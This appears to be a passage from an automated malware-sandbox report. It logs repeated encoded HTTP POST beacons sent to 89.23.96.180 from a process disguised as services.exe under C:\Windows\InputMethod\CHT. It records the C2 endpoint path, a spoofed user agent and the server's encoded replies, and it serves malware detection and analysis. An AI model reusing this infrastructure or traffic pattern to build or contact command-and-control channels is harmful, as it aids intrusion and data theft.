                                                              15192.168.2.54978589.23.96.180801352C:\Windows\InputMethod\CHT\services.exe
                                                              TimestampBytes transferredDirectionData
                                                              Dec 21, 2024 10:47:48.151933908 CET398OUTPOST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1
                                                              Content-Type: application/octet-stream
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
                                                              Host: 89.23.96.180
                                                              Content-Length: 2536
                                                              Expect: 100-continue
                                                              Dec 21, 2024 10:47:48.502629042 CET2536OUTData Raw: 5d 55 43 53 5d 5d 52 53 55 5e 55 5a 54 58 50 55 57 53 5c 59 52 51 51 5f 5f 5d 58 5e 54 5c 5d 59 5f 5b 54 58 5a 5f 53 5f 59 5a 55 5e 54 57 51 5d 52 56 5b 41 5d 52 57 52 59 5e 50 52 54 56 58 58 50 5b 58 5c 5a 5e 51 56 5d 5f 42 5a 44 5f 5f 55 5b 5c
                                                              Data Ascii: ]UCS]]RSU^UZTXPUWS\YRQQ__]X^T\]Y_[TXZ_S_YZU^TWQ]RV[A]RWRY^PRTVXXP[X\Z^QV]_BZD__U[\X^TZ\_U_VRZQQVPV\]XYXRXSFYXX__^RTWCZPV]Y\^T[[_UQ]^RX][Y^]QXUYWWZPGUX^R]CC_\^PYAVYZ^YVR^ZP[T\PPF^__B[UY .!'&[6?1,/;';-(9 52"T<'+?>;+%!_.#Q,*
                                                              Dec 21, 2024 10:47:49.538532972 CET25INHTTP/1.1 100 Continue
                                                              Dec 21, 2024 10:47:49.774282932 CET200INHTTP/1.1 200 OK
                                                              Server: nginx
                                                              Date: Sat, 21 Dec 2024 09:47:49 GMT
                                                              Content-Type: text/html; charset=UTF-8
                                                              Transfer-Encoding: chunked
                                                              Connection: keep-alive
                                                              Vary: Accept-Encoding
                                                              Data Raw: 34 0d 0a 3c 56 40 5b 0d 0a 30 0d 0a 0d 0a
                                                              Data Ascii: 4<V@[0


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              16192.168.2.54979189.23.96.180801352C:\Windows\InputMethod\CHT\services.exe
                                                              TimestampBytes transferredDirectionData
                                                              Dec 21, 2024 10:47:50.010797024 CET398OUTPOST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1
                                                              Content-Type: application/octet-stream
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
                                                              Host: 89.23.96.180
                                                              Content-Length: 2536
                                                              Expect: 100-continue
                                                              Dec 21, 2024 10:47:50.362039089 CET2536OUTData Raw: 5d 51 46 53 58 5b 57 57 55 5e 55 5a 54 52 50 54 57 5a 5c 5b 52 53 51 5d 5f 5d 58 5e 54 5c 5d 59 5f 5b 54 58 5a 5f 53 5f 59 5a 55 5e 54 57 51 5d 52 56 5b 41 5d 52 57 52 59 5e 50 52 54 56 58 58 50 5b 58 5c 5a 5e 51 56 5d 5f 42 5a 44 5f 5f 55 5b 5c
                                                              Data Ascii: ]QFSX[WWU^UZTRPTWZ\[RSQ]_]X^T\]Y_[TXZ_S_YZU^TWQ]RV[A]RWRY^PRTVXXP[X\Z^QV]_BZD__U[\X^TZ\_U_VRZQQVPV\]XYXRXSFYXX__^RTWCZPV]Y\^T[[_UQ]^RX][Y^]QXUYWWZPGUX^R]CC_\^PYAVYZ^YVR^ZP[T\PPF^__B[UY A-$>!=2!-<;%/T.#?*&>+$<=7)!_.#Q,
                                                              Dec 21, 2024 10:47:51.387914896 CET25INHTTP/1.1 100 Continue
                                                              Dec 21, 2024 10:47:51.625848055 CET200INHTTP/1.1 200 OK
                                                              Server: nginx
                                                              Date: Sat, 21 Dec 2024 09:47:51 GMT
                                                              Content-Type: text/html; charset=UTF-8
                                                              Transfer-Encoding: chunked
                                                              Connection: keep-alive
                                                              Vary: Accept-Encoding
                                                              Data Raw: 34 0d 0a 3c 56 40 5b 0d 0a 30 0d 0a 0d 0a
                                                              Data Ascii: 4<V@[0


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              17192.168.2.54979789.23.96.180801352C:\Windows\InputMethod\CHT\services.exe
                                                              TimestampBytes transferredDirectionData
                                                              Dec 21, 2024 10:47:51.869127989 CET422OUTPOST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1
                                                              Content-Type: application/octet-stream
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
                                                              Host: 89.23.96.180
                                                              Content-Length: 2536
                                                              Expect: 100-continue
                                                              Connection: Keep-Alive
                                                              Dec 21, 2024 10:47:52.221350908 CET2536OUTData Raw: 58 53 43 56 58 59 57 53 55 5e 55 5a 54 59 50 55 57 52 5c 55 52 50 51 59 5f 5d 58 5e 54 5c 5d 59 5f 5b 54 58 5a 5f 53 5f 59 5a 55 5e 54 57 51 5d 52 56 5b 41 5d 52 57 52 59 5e 50 52 54 56 58 58 50 5b 58 5c 5a 5e 51 56 5d 5f 42 5a 44 5f 5f 55 5b 5c
                                                              Data Ascii: XSCVXYWSU^UZTYPUWR\URPQY_]X^T\]Y_[TXZ_S_YZU^TWQ]RV[A]RWRY^PRTVXXP[X\Z^QV]_BZD__U[\X^TZ\_U_VRZQQVPV\]XYXRXSFYXX__^RTWCZPV]Y\^T[[_UQ]^RX][Y^]QXUYWWZPGUX^R]CC_\^PYAVYZ^YVR^ZP[T\PPF^__B[UY A-2$S2&)1Z,?<Y3</987=&""V+$8<=$)%!_.#Q,.
                                                              Dec 21, 2024 10:47:53.246582985 CET25INHTTP/1.1 100 Continue
                                                              Dec 21, 2024 10:47:53.481827021 CET200INHTTP/1.1 200 OK
                                                              Server: nginx
                                                              Date: Sat, 21 Dec 2024 09:47:53 GMT
                                                              Content-Type: text/html; charset=UTF-8
                                                              Transfer-Encoding: chunked
                                                              Connection: keep-alive
                                                              Vary: Accept-Encoding
                                                              Data Raw: 34 0d 0a 3c 56 40 5b 0d 0a 30 0d 0a 0d 0a
                                                              Data Ascii: 4<V@[0


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              18192.168.2.54980389.23.96.180801352C:\Windows\InputMethod\CHT\services.exe
                                                              TimestampBytes transferredDirectionData
                                                              Dec 21, 2024 10:47:53.730128050 CET422OUTPOST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1
                                                              Content-Type: application/octet-stream
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
                                                              Host: 89.23.96.180
                                                              Content-Length: 2532
                                                              Expect: 100-continue
                                                              Connection: Keep-Alive
                                                              Dec 21, 2024 10:47:54.080955029 CET2532OUTData Raw: 58 57 46 57 5d 5f 57 56 55 5e 55 5a 54 5b 50 53 57 58 5c 5f 52 51 51 5c 5f 5d 58 5e 54 5c 5d 59 5f 5b 54 58 5a 5f 53 5f 59 5a 55 5e 54 57 51 5d 52 56 5b 41 5d 52 57 52 59 5e 50 52 54 56 58 58 50 5b 58 5c 5a 5e 51 56 5d 5f 42 5a 44 5f 5f 55 5b 5c
                                                              Data Ascii: XWFW]_WVU^UZT[PSWX\_RQQ\_]X^T\]Y_[TXZ_S_YZU^TWQ]RV[A]RWRY^PRTVXXP[X\Z^QV]_BZD__U[\X^TZ\_U_VRZQQVPV\]XYXRXSFYXX__^RTWCZPV]Y\^T[[_UQ]^RX][Y^]QXUYWWZPGUX^R]CC_\^PYAVYZ^YVR^ZP[T\PPF^__B[UY ." U%->!-_,,0]%,#-8!S7/1!+4(?X+%!_.#Q,>


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              19192.168.2.54980489.23.96.180801352C:\Windows\InputMethod\CHT\services.exe
                                                              TimestampBytes transferredDirectionData
                                                              Dec 21, 2024 10:47:54.204754114 CET422OUTPOST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1
                                                              Content-Type: application/octet-stream
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
                                                              Host: 89.23.96.180
                                                              Content-Length: 2112
                                                              Expect: 100-continue
                                                              Connection: Keep-Alive
                                                              Dec 21, 2024 10:47:54.549540997 CET2112OUTData Raw: 58 51 43 5e 5d 56 57 56 55 5e 55 5a 54 5c 50 53 57 5f 5c 5f 52 56 51 5a 5f 5d 58 5e 54 5c 5d 59 5f 5b 54 58 5a 5f 53 5f 59 5a 55 5e 54 57 51 5d 52 56 5b 41 5d 52 57 52 59 5e 50 52 54 56 58 58 50 5b 58 5c 5a 5e 51 56 5d 5f 42 5a 44 5f 5f 55 5b 5c
                                                              Data Ascii: XQC^]VWVU^UZT\PSW_\_RVQZ_]X^T\]Y_[TXZ_S_YZU^TWQ]RV[A]RWRY^PRTVXXP[X\Z^QV]_BZD__U[\X^TZ\_U_VRZQQVPV\]XYXRXSFYXX__^RTWCZPV]Y\^T[[_UQ]^RX][Y^]QXUYWWZPGUX^R]CC_\^PYAVYZ^YVR^ZP[T\PPF^__B[UY#:1%[&>2&-,,X3?8-;&4%2"T(4^>-+=5!_.#Q,
                                                              Dec 21, 2024 10:47:55.581733942 CET25INHTTP/1.1 100 Continue
                                                              Dec 21, 2024 10:47:55.816329956 CET349INHTTP/1.1 200 OK
                                                              Server: nginx
                                                              Date: Sat, 21 Dec 2024 09:47:55 GMT
                                                              Content-Type: text/html; charset=UTF-8
                                                              Transfer-Encoding: chunked
                                                              Connection: keep-alive
                                                              Vary: Accept-Encoding
                                                              Data Raw: 39 38 0d 0a 0e 1e 39 54 37 15 29 57 3f 03 37 1d 3d 2c 26 50 3e 2e 2a 14 2f 31 30 02 21 02 3e 12 2a 2d 3f 58 26 3e 23 5c 22 3a 25 11 22 01 0d 59 2a 31 2e 58 01 1e 22 1c 34 0d 25 1e 24 06 2f 1c 29 09 32 5d 28 00 22 10 30 3f 23 57 32 14 12 5f 3f 2a 27 0c 32 3d 0c 10 38 2f 28 03 2b 10 28 55 27 36 2b 51 03 1e 26 59 26 05 3b 53 31 0d 1c 07 26 3d 21 59 22 3e 01 56 2a 28 01 51 37 38 3d 05 2f 29 0a 5f 29 2d 2a 5c 2a 06 2d 06 24 2f 2b 53 31 2e 23 54 2d 00 2c 48 00 31 5d 56 0d 0a 30 0d 0a 0d 0a
                                                              Data Ascii: 989T7)W?7=,&P>.*/10!>*-?X&>#\":%"Y*1.X"4%$/)2]("0?#W2_?*'2=8/(+(U'6+Q&Y&;S1&=!Y">V*(Q78=/)_)-*\*-$/+S1.#T-,H1]V0


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              20192.168.2.54980589.23.96.180801352C:\Windows\InputMethod\CHT\services.exe
                                                              TimestampBytes transferredDirectionData
                                                              Dec 21, 2024 10:47:54.333041906 CET422OUTPOST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1
                                                              Content-Type: application/octet-stream
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
                                                              Host: 89.23.96.180
                                                              Content-Length: 2532
                                                              Expect: 100-continue
                                                              Connection: Keep-Alive
                                                              Dec 21, 2024 10:47:54.690097094 CET2532OUTData Raw: 5d 51 46 55 5d 5c 57 54 55 5e 55 5a 54 5b 50 53 57 52 5c 59 52 53 51 58 5f 5d 58 5e 54 5c 5d 59 5f 5b 54 58 5a 5f 53 5f 59 5a 55 5e 54 57 51 5d 52 56 5b 41 5d 52 57 52 59 5e 50 52 54 56 58 58 50 5b 58 5c 5a 5e 51 56 5d 5f 42 5a 44 5f 5f 55 5b 5c
                                                              Data Ascii: ]QFU]\WTU^UZT[PSWR\YRSQX_]X^T\]Y_[TXZ_S_YZU^TWQ]RV[A]RWRY^PRTVXXP[X\Z^QV]_BZD__U[\X^TZ\_U_VRZQQVPV\]XYXRXSFYXX__^RTWCZPV]Y\^T[[_UQ]^RX][Y^]QXUYWWZPGUX^R]CC_\^PYAVYZ^YVR^ZP[T\PPF^__B[UY D92;%>!*1=.Y;'?9)S"<)Y11)<$?-)%!_.#Q,>
                                                              Dec 21, 2024 10:47:55.708646059 CET25INHTTP/1.1 100 Continue
                                                              Dec 21, 2024 10:47:55.942177057 CET200INHTTP/1.1 200 OK
                                                              Server: nginx
                                                              Date: Sat, 21 Dec 2024 09:47:55 GMT
                                                              Content-Type: text/html; charset=UTF-8
                                                              Transfer-Encoding: chunked
                                                              Connection: keep-alive
                                                              Vary: Accept-Encoding
                                                              Data Raw: 34 0d 0a 3c 56 40 5b 0d 0a 30 0d 0a 0d 0a
                                                              Data Ascii: 4<V@[0


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              21192.168.2.54981189.23.96.180801352C:\Windows\InputMethod\CHT\services.exe
                                                              TimestampBytes transferredDirectionData
                                                              Dec 21, 2024 10:47:56.185380936 CET398OUTPOST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1
                                                              Content-Type: application/octet-stream
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
                                                              Host: 89.23.96.180
                                                              Content-Length: 2536
                                                              Expect: 100-continue
                                                              Dec 21, 2024 10:47:56.534126997 CET2536OUTData Raw: 58 53 43 57 5d 5b 52 53 55 5e 55 5a 54 58 50 52 57 5e 5c 5b 52 5f 51 59 5f 5d 58 5e 54 5c 5d 59 5f 5b 54 58 5a 5f 53 5f 59 5a 55 5e 54 57 51 5d 52 56 5b 41 5d 52 57 52 59 5e 50 52 54 56 58 58 50 5b 58 5c 5a 5e 51 56 5d 5f 42 5a 44 5f 5f 55 5b 5c
                                                              Data Ascii: XSCW][RSU^UZTXPRW^\[R_QY_]X^T\]Y_[TXZ_S_YZU^TWQ]RV[A]RWRY^PRTVXXP[X\Z^QV]_BZD__U[\X^TZ\_U_VRZQQVPV\]XYXRXSFYXX__^RTWCZPV]Y\^T[[_UQ]^RX][Y^]QXUYWWZPGUX^R]CC_\^PYAVYZ^YVR^ZP[T\PPF^__B[UY E-(R1>=5\9<Y$,8R9% <9\2*U+( *!_.#Q,*
                                                              Dec 21, 2024 10:47:57.562369108 CET25INHTTP/1.1 100 Continue
                                                              Dec 21, 2024 10:47:57.801831961 CET200INHTTP/1.1 200 OK
                                                              Server: nginx
                                                              Date: Sat, 21 Dec 2024 09:47:57 GMT
                                                              Content-Type: text/html; charset=UTF-8
                                                              Transfer-Encoding: chunked
                                                              Connection: keep-alive
                                                              Vary: Accept-Encoding
                                                              Data Raw: 34 0d 0a 3c 56 40 5b 0d 0a 30 0d 0a 0d 0a
                                                              Data Ascii: 4<V@[0


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              22192.168.2.54981689.23.96.180801352C:\Windows\InputMethod\CHT\services.exe
                                                              TimestampBytes transferredDirectionData
                                                              Dec 21, 2024 10:47:58.043170929 CET422OUTPOST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1
                                                              Content-Type: application/octet-stream
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
                                                              Host: 89.23.96.180
                                                              Content-Length: 2536
                                                              Expect: 100-continue
                                                              Connection: Keep-Alive
                                                              Dec 21, 2024 10:47:58.393548012 CET2536OUTData Raw: 5d 51 46 57 58 5d 52 54 55 5e 55 5a 54 53 50 50 57 5e 5c 54 52 51 51 5c 5f 5d 58 5e 54 5c 5d 59 5f 5b 54 58 5a 5f 53 5f 59 5a 55 5e 54 57 51 5d 52 56 5b 41 5d 52 57 52 59 5e 50 52 54 56 58 58 50 5b 58 5c 5a 5e 51 56 5d 5f 42 5a 44 5f 5f 55 5b 5c
                                                              Data Ascii: ]QFWX]RTU^UZTSPPW^\TRQQ\_]X^T\]Y_[TXZ_S_YZU^TWQ]RV[A]RWRY^PRTVXXP[X\Z^QV]_BZD__U[\X^TZ\_U_VRZQQVPV\]XYXRXSFYXX__^RTWCZPV]Y\^T[[_UQ]^RX][Y^]QXUYWWZPGUX^R]CC_\^PYAVYZ^YVR^ZP[T\PPF^__B[UY A-"'$=">*:<'$0T-("",>22V+43^<<[+5!_.#Q,
                                                              Dec 21, 2024 10:47:59.420309067 CET25INHTTP/1.1 100 Continue
                                                              Dec 21, 2024 10:47:59.658010960 CET200INHTTP/1.1 200 OK
                                                              Server: nginx
                                                              Date: Sat, 21 Dec 2024 09:47:59 GMT
                                                              Content-Type: text/html; charset=UTF-8
                                                              Transfer-Encoding: chunked
                                                              Connection: keep-alive
                                                              Vary: Accept-Encoding
                                                              Data Raw: 34 0d 0a 3c 56 40 5b 0d 0a 30 0d 0a 0d 0a
                                                              Data Ascii: 4<V@[0


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              23192.168.2.54981989.23.96.180801352C:\Windows\InputMethod\CHT\services.exe
                                                              TimestampBytes transferredDirectionData
                                                              Dec 21, 2024 10:47:59.915047884 CET422OUTPOST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1
                                                              Content-Type: application/octet-stream
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
                                                              Host: 89.23.96.180
                                                              Content-Length: 2536
                                                              Expect: 100-continue
                                                              Connection: Keep-Alive
                                                              Dec 21, 2024 10:48:00.277800083 CET2536OUTData Raw: 58 55 46 52 58 5a 57 50 55 5e 55 5a 54 5c 50 55 57 5d 5c 5a 52 50 51 5d 5f 5d 58 5e 54 5c 5d 59 5f 5b 54 58 5a 5f 53 5f 59 5a 55 5e 54 57 51 5d 52 56 5b 41 5d 52 57 52 59 5e 50 52 54 56 58 58 50 5b 58 5c 5a 5e 51 56 5d 5f 42 5a 44 5f 5f 55 5b 5c
                                                              Data Ascii: XUFRXZWPU^UZT\PUW]\ZRPQ]_]X^T\]Y_[TXZ_S_YZU^TWQ]RV[A]RWRY^PRTVXXP[X\Z^QV]_BZD__U[\X^TZ\_U_VRZQQVPV\]XYXRXSFYXX__^RTWCZPV]Y\^T[[_UQ]^RX][Y^]QXUYWWZPGUX^R]CC_\^PYAVYZ^YVR^ZP[T\PPF^__B[UY E9+1=-Q*!]-/?'<<W-;5S"<)2!*V?(+-^>%!_.#Q,


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              24192.168.2.54982489.23.96.180801352C:\Windows\InputMethod\CHT\services.exe
                                                              TimestampBytes transferredDirectionData
                                                              Dec 21, 2024 10:48:00.951884985 CET422OUTPOST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1
                                                              Content-Type: application/octet-stream
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
                                                              Host: 89.23.96.180
                                                              Content-Length: 2112
                                                              Expect: 100-continue
                                                              Connection: Keep-Alive
                                                              Dec 21, 2024 10:48:01.299483061 CET2112OUTData Raw: 5d 56 43 57 58 59 57 50 55 5e 55 5a 54 5e 50 55 57 5c 5c 54 52 52 51 56 5f 5d 58 5e 54 5c 5d 59 5f 5b 54 58 5a 5f 53 5f 59 5a 55 5e 54 57 51 5d 52 56 5b 41 5d 52 57 52 59 5e 50 52 54 56 58 58 50 5b 58 5c 5a 5e 51 56 5d 5f 42 5a 44 5f 5f 55 5b 5c
                                                              Data Ascii: ]VCWXYWPU^UZT^PUW\\TRRQV_]X^T\]Y_[TXZ_S_YZU^TWQ]RV[A]RWRY^PRTVXXP[X\Z^QV]_BZD__U[\X^TZ\_U_VRZQQVPV\]XYXRXSFYXX__^RTWCZPV]Y\^T[[_UQ]^RX][Y^]QXUYWWZPGUX^R]CC_\^PYAVYZ^YVR^ZP[T\PPF^__B[UY#.0S%=-T>1[./$,.857?&115+7(<.8^>5!_.#Q,2
                                                              Dec 21, 2024 10:48:02.339270115 CET25INHTTP/1.1 100 Continue
                                                              Dec 21, 2024 10:48:02.570477009 CET349INHTTP/1.1 200 OK
                                                              Server: nginx
                                                              Date: Sat, 21 Dec 2024 09:48:02 GMT
                                                              Content-Type: text/html; charset=UTF-8
                                                              Transfer-Encoding: chunked
                                                              Connection: keep-alive
                                                              Vary: Accept-Encoding
                                                              Data Raw: 39 38 0d 0a 0e 1e 39 52 20 2b 21 52 3c 03 30 01 2a 06 31 08 3e 2e 21 00 2f 21 27 5c 35 05 25 01 28 2e 3b 59 30 58 2f 11 22 29 31 11 20 2f 2f 59 3e 31 2e 58 01 1e 22 19 37 30 31 53 27 2c 34 0c 3e 51 32 17 3f 00 00 5d 30 11 33 50 26 2a 20 58 2b 14 28 1c 26 03 2a 11 38 01 27 10 2b 07 20 1d 27 26 2b 51 03 1e 26 11 26 12 0d 1c 26 1d 35 5f 24 3e 2a 07 20 10 20 0c 3e 5e 34 0f 21 2b 3e 5f 2f 17 37 00 3f 03 3a 11 2a 06 2a 5b 25 3c 09 52 25 3e 23 54 2d 00 2c 48 00 31 5d 56 0d 0a 30 0d 0a 0d 0a
                                                              Data Ascii: 989R +!R<0*1>.!/!'\5%(.;Y0X/")1 //Y>1.X"701S',4>Q2?]03P&* X+(&*8'+ '&+Q&&&5_$>* >^4!+>_/7?:**[%<R%>#T-,H1]V0


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              25192.168.2.54982589.23.96.180801352C:\Windows\InputMethod\CHT\services.exe
                                                              TimestampBytes transferredDirectionData
                                                              Dec 21, 2024 10:48:01.074760914 CET422OUTPOST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1
                                                              Content-Type: application/octet-stream
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
                                                              Host: 89.23.96.180
                                                              Content-Length: 2536
                                                              Expect: 100-continue
                                                              Connection: Keep-Alive
                                                              Dec 21, 2024 10:48:01.424546003 CET2536OUTData Raw: 58 56 46 50 58 5c 57 55 55 5e 55 5a 54 5e 50 54 57 53 5c 5a 52 54 51 5b 5f 5d 58 5e 54 5c 5d 59 5f 5b 54 58 5a 5f 53 5f 59 5a 55 5e 54 57 51 5d 52 56 5b 41 5d 52 57 52 59 5e 50 52 54 56 58 58 50 5b 58 5c 5a 5e 51 56 5d 5f 42 5a 44 5f 5f 55 5b 5c
                                                              Data Ascii: XVFPX\WUU^UZT^PTWS\ZRTQ[_]X^T\]Y_[TXZ_S_YZU^TWQ]RV[A]RWRY^PRTVXXP[X\Z^QV]_BZD__U[\X^TZ\_U_VRZQQVPV\]XYXRXSFYXX__^RTWCZPV]Y\^T[[_UQ]^RX][Y^]QXUYWWZPGUX^R]CC_\^PYAVYZ^YVR^ZP[T\PPF^__B[UY B-%.?!69<0\'?:!W4Y6&!2($\>.++%!_.#Q,2
                                                              Dec 21, 2024 10:48:02.454571009 CET25INHTTP/1.1 100 Continue
                                                              Dec 21, 2024 10:48:02.690433979 CET200INHTTP/1.1 200 OK
                                                              Server: nginx
                                                              Date: Sat, 21 Dec 2024 09:48:02 GMT
                                                              Content-Type: text/html; charset=UTF-8
                                                              Transfer-Encoding: chunked
                                                              Connection: keep-alive
                                                              Vary: Accept-Encoding
                                                              Data Raw: 34 0d 0a 3c 56 40 5b 0d 0a 30 0d 0a 0d 0a
                                                              Data Ascii: 4<V@[0


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              26192.168.2.54983189.23.96.180801352C:\Windows\InputMethod\CHT\services.exe
                                                              TimestampBytes transferredDirectionData
                                                              Dec 21, 2024 10:48:02.971949100 CET398OUTPOST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1
                                                              Content-Type: application/octet-stream
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
                                                              Host: 89.23.96.180
                                                              Content-Length: 2536
                                                              Expect: 100-continue
                                                              Dec 21, 2024 10:48:03.353205919 CET2536OUTData Raw: 5d 54 46 50 5d 5d 52 50 55 5e 55 5a 54 59 50 57 57 5e 5c 54 52 5f 51 59 5f 5d 58 5e 54 5c 5d 59 5f 5b 54 58 5a 5f 53 5f 59 5a 55 5e 54 57 51 5d 52 56 5b 41 5d 52 57 52 59 5e 50 52 54 56 58 58 50 5b 58 5c 5a 5e 51 56 5d 5f 42 5a 44 5f 5f 55 5b 5c
                                                              Data Ascii: ]TFP]]RPU^UZTYPWW^\TR_QY_]X^T\]Y_[TXZ_S_YZU^TWQ]RV[A]RWRY^PRTVXXP[X\Z^QV]_BZD__U[\X^TZ\_U_VRZQQVPV\]XYXRXSFYXX__^RTWCZPV]Y\^T[[_UQ]^RX][Y^]QXUYWWZPGUX^R]CC_\^PYAVYZ^YVR^ZP[T\PPF^__B[UY E:/2&)W5-0?8- ,&1-++^+$_+5!_.#Q,.
                                                              Dec 21, 2024 10:48:04.315351963 CET25INHTTP/1.1 100 Continue
                                                              Dec 21, 2024 10:48:04.553910017 CET200INHTTP/1.1 200 OK
                                                              Server: nginx
                                                              Date: Sat, 21 Dec 2024 09:48:04 GMT
                                                              Content-Type: text/html; charset=UTF-8
                                                              Transfer-Encoding: chunked
                                                              Connection: keep-alive
                                                              Vary: Accept-Encoding
                                                              Data Raw: 34 0d 0a 3c 56 40 5b 0d 0a 30 0d 0a 0d 0a
                                                              Data Ascii: 4<V@[0


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              27192.168.2.54983789.23.96.180801352C:\Windows\InputMethod\CHT\services.exe
                                                              TimestampBytes transferredDirectionData
                                                              Dec 21, 2024 10:48:04.807739019 CET422OUTPOST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1
                                                              Content-Type: application/octet-stream
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
                                                              Host: 89.23.96.180
                                                              Content-Length: 2536
                                                              Expect: 100-continue
                                                              Connection: Keep-Alive
                                                              Dec 21, 2024 10:48:05.158932924 CET2536OUTData Raw: 58 55 46 52 58 5a 57 56 55 5e 55 5a 54 58 50 54 57 53 5c 5b 52 53 51 5f 5f 5d 58 5e 54 5c 5d 59 5f 5b 54 58 5a 5f 53 5f 59 5a 55 5e 54 57 51 5d 52 56 5b 41 5d 52 57 52 59 5e 50 52 54 56 58 58 50 5b 58 5c 5a 5e 51 56 5d 5f 42 5a 44 5f 5f 55 5b 5c
                                                              Data Ascii: XUFRXZWVU^UZTXPTWS\[RSQ__]X^T\]Y_[TXZ_S_YZU^TWQ]RV[A]RWRY^PRTVXXP[X\Z^QV]_BZD__U[\X^TZ\_U_VRZQQVPV\]XYXRXSFYXX__^RTWCZPV]Y\^T[[_UQ]^RX][Y^]QXUYWWZPGUX^R]CC_\^PYAVYZ^YVR^ZP[T\PPF^__B[UY#91,&=*)-$<$V.8* /25((8)!_.#Q,*
                                                              Dec 21, 2024 10:48:06.185286999 CET25INHTTP/1.1 100 Continue
                                                              Dec 21, 2024 10:48:06.422095060 CET200INHTTP/1.1 200 OK
                                                              Server: nginx
                                                              Date: Sat, 21 Dec 2024 09:48:05 GMT
                                                              Content-Type: text/html; charset=UTF-8
                                                              Transfer-Encoding: chunked
                                                              Connection: keep-alive
